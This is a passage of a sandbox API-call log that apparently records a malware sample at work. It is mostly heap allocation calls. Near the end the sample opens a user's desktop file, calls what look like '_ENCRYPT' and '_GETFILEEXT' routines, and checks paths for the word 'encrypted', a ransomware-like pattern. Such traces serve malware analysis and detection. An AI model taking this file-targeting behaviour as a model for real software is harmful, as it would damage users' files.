RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0030.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0030.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0030.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.183] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0030.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0030.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0030.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0030.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0030.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0030.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.184] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.184] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.185] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.185] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0030.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889a90 [0030.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889a90, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0030.185] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\orvajyb.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0030.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.185] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.185] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.185] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0030.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0030.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.186] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0030.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.186] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889af0 [0030.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889af0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0030.186] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.186] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0030.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0030.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0030.186] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0030.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0030.186] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0030.186] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.186] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0030.186] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0030.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.187] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.187] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.187] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.187] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4c6800, ftCreationTime.dwHighDateTime=0x1d5c2be, ftLastAccessTime.dwLowDateTime=0x43841660, ftLastAccessTime.dwHighDateTime=0x1d5c516, ftLastWriteTime.dwLowDateTime=0x43841660, ftLastWriteTime.dwHighDateTime=0x1d5c516, nFileSizeHigh=0x0, nFileSizeLow=0x2639, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ORvAJyb.ots", cAlternateFileName="")) returned 0x7c20c0 [0030.187] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.187] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.187] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4c6800, ftCreationTime.dwHighDateTime=0x1d5c2be, ftLastAccessTime.dwLowDateTime=0x43841660, ftLastAccessTime.dwHighDateTime=0x1d5c516, ftLastWriteTime.dwLowDateTime=0x43841660, ftLastWriteTime.dwHighDateTime=0x1d5c516, nFileSizeHigh=0x0, nFileSizeLow=0x2639, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ORvAJyb.ots", cAlternateFileName="")) returned 0x7c20c0 [0030.187] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.187] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.187] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 